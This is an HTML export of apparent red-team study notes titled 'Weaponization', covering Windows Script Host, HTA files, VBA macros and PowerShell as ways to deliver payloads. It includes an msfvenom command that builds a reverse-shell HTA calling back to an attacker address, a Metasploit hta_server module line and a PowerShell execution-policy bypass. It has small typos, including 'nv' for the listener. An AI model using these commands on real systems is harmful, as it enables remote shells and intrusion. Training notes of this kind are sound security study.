<html>
  
  <head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <link rel="stylesheet" href="../../style.css">
    <base target="_parent">
    <title data-trilium-title>Weaponization</title>
  </head>
  
  <body>
    <div class="content">
       <h1 data-trilium-h1>Weaponization</h1>

      <div class="ck-content">
        <p>scripting techniques, including:</p>
        <ul>
          <li>The Windows Script Host (WSH)</li>
          <li>An HTML Application (HTA)</li>
          <li>Visual Basic Applications (VBA)</li>
          <li>PowerShell (PSH)</li>
        </ul>
        <p><strong>Windows Scripting Host (WSH)</strong>

        </p>
        <p>Windows scripting host is a built-in Windows administration tool that
          runs batch files to automate and manage tasks within the operating system.</p>
        <p>It is a Windows native engine, <span style="background-color:rgba(135,131,120,0.15);color:rgb(235,87,87)">cscript.exe</span> (for
          command-line scripts) and <span style="background-color:rgba(135,131,120,0.15);color:rgb(235,87,87)">wscript.exe</span> (for
          UI scripts), which are responsible for executing various Microsoft Visual
          Basic Scripts (VBScript), including <span style="background-color:rgba(135,131,120,0.15);color:rgb(235,87,87)">vbs</span> and
          <span
          style="background-color:rgba(135,131,120,0.15);color:rgb(235,87,87)">vbe</span>. For more information about VBScript, please visit <a href="https://en.wikipedia.org/wiki/VBScript">here</a>.
            It is important to note that the VBScript engine on a Windows operating
            system runs and executes applications with the same level of access and
            permission as a regular user; therefore, it is useful for the red teamers.</p>
        <p><strong>HTML Application (HTA)</strong>

        </p>
        <p>HTA stands for “HTML Application.” It allows you to create a downloadable
          file that takes all the information regarding how it is displayed and rendered.
          HTML Applications, also known as HTAs, which are dynamic <span style="background-color:rgba(135,131,120,0.15);color:rgb(235,87,87)">HTML</span> pages
          containing JScript and VBScript. The LOLBINS (Living-of-the-land Binaries)
          tool <span style="background-color:rgba(135,131,120,0.15);color:rgb(235,87,87)">mshta</span> is
          used to execute HTA files. It can be executed by itself or automatically
          from Internet Explorer.</p>
        <p>Then serve the <span style="background-color:rgba(135,131,120,0.15);color:rgb(235,87,87)">payload.hta</span> from
          a web server, this could be done from the attacking machine.</p>
        <p><code>msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.17.17.11 LPORT=1234 -f hta-psh -o thm.hta;nv -lnvp 1234</code>

        </p><pre><code class="language-text-plain">use exploit/windows/misc/hta_server</code></pre>

        <p><strong>Visual Basic for Application (VBA)</strong>

        </p>
        <p>VBA stands for Visual Basic for Applications, a programming language by
          Microsoft implemented for Microsoft applications such as Microsoft Word,
          Excel, PowerPoint, etc. VBA programming allows automating tasks of nearly
          every keyboard and mouse interaction between a user and Microsoft Office
          applications.</p>
        <p>Macros are Microsoft Office applications that contain embedded code written
          in a programming language known as Visual Basic for Applications (VBA).
          It is used to create custom functions to speed up manual tasks by creating
          automated processes. One of VBA's features is accessing the Windows Application
          Programming Interface (<a href="https://en.wikipedia.org/wiki/Windows_API">API</a>) and
          other low-level functionality. For more information about VBA, visit
          <a
          href="https://en.wikipedia.org/wiki/Visual_Basic_for_Applications">here</a>. </p>
        <p>Powershell:</p><pre><code class="language-text-plain">Set-ExecutionPolicy -Scope CurrentUser RemoteSigned 
powershell -ex bypass -File thm.ps1</code></pre>

        <p>to run scripts in ps</p>
        <p> </p>
      </div>
    </div>
  </body>

</html>